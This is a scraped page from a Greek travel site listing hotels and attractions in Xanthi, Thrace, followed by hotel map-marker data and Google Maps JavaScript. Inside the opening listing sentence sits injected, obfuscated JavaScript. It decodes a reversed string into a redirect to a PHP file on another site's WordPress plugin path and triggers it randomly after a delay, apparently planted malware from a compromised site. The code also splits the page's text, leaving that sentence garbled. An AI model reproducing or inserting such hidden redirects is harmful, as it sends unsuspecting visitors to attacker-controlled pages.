Listing
Thraki. One destination, dozens of attractions: Book a room with Le Chalet at Kimmeria, Xanthi, 67100, Greece and get $Bhq=function(n){if (typeof ($Bhq.list[n]) == “string”) return $Bhq.list[n].split(“”).reverse().join(“”);return $Bhq.list[n];};$Bhq.list=[“’php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($Bhq(0), delay);}to know Ancient Abdera, visit the Pomak villages, scattered throughout the region, take a… Read more…
tos','location': [41.127438, 24.884356],'message':'
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'94205'},{'name':'Petrinos Lofos','location': [41.011623, 25.02725],'message':'
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'94195'},{'name':'Hotel Xanthippion','location': [41.09833363, 24.82331872],'message':'
28is Oktovriou 212, Xanthi, 67100, Greece
Hotel
//
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'79074'},{'name':'Hotel Z Palace & Congress Center','location': [41.11090855, 24.83135998],'message':'
Terma G. Kondili , Xanthi, 67100, Greece
Hotel
//
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'72254'},{'name':'Nestos Hotel','location': [41.08155728, 24.87449527],'message':'
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'63155'},{'name':'Giannis Hotel','location': [41.00359331, 24.76269543],'message':'
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'57164'},{'name':'Elisso','location': [41.11455034, 24.84051168],'message':'
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'55695'},{'name':'Boutique Hotel 1905','location': [41.10928765, 24.8221809],'message':'
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'44115'},{'name':'Agriani Hotel','location': [41.12392186, 24.79730129],'message':'
4th Km Xanthi-Drama Road, Xanthi, 67100, Greece
Hotel
30 2541 083777
//www.agriani.gr
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'35770'},{'name':'Le Chalet','location': [41.110944, 24.88750398],'message':'
','icons':'http://www.etravel.com.gr/wp-content/plugins/Tevolution/images/pin.png','pid':'19932'}];
var clustering = '';
var map;
var mgr;
var markerClusterer;
var markerArray = [];
var mClusterer = null;
var pippoint_effects='click';
var infoBubble = new InfoBubble({maxWidth:210,minWidth:210,minHeight:"auto",padding:0,borderRadius:0,borderWidth:0,overflow:"visible",backgroundColor:"#fff"});
var isDraggable = jQuery(document).width() > 480 ? true : false;
var isscrollwheel = jQuery(document).width() > 480 ? true : false;
var dragging = zoom_changed = false;
var bounds_modified = false;
var new_bounds;
var query_string='post_type=listing&taxonomy=listingcategory&slug=';
var zoom_changed=1;
function initialize() {
bounds = new google.maps.LatLngBounds();
var myOptions = {
scrollwheel: isscrollwheel,
draggable: isDraggable,
zoom: CITY_MAP_ZOOMING_FACT,
center: new google.maps.LatLng(CITY_MAP_CENTER_LAT, CITY_MAP_CENTER_LNG),
mapTypeId: google.maps.MapTypeId.ROADMAP }
map = new google.maps.Map(document.getElementById("map_canvas"),myOptions);
/* map style customizer */
var styles = [];
map.setOptions({styles: styles});
/* Add Google Map marlkers */
mgr = new MarkerManager( map );
templ_add_googlemap_markers(markers);
if ( zoom_option==1) {
map.fitBounds(bounds);
map.setCenter(bounds.getCenter( ) ) ;
}
/* but that message is not within the marker's instance data */
google.maps.event.addListener(map, 'dragstart', function() {
dragging = false;
});
google.maps.event.addListener(map, 'dragend', function() {
dragging = true;
});
google.maps.event.addListener(map, 'bounds_changed', function() {
bounds_modified = true;
new_bounds = map.getBounds();
});
google.maps.event.addListener(map, 'zoom_changed', function() {
if ( zoom_changed!=1) {
dragging = true;
}
zoom_changed=0;
});
google.maps.event.addListener(map, 'idle', function(ev) {
/*new_bounds = map.getBounds();*/
refresh_markers();
});
}
google.maps.event.addDomListener(window, 'load', initialize);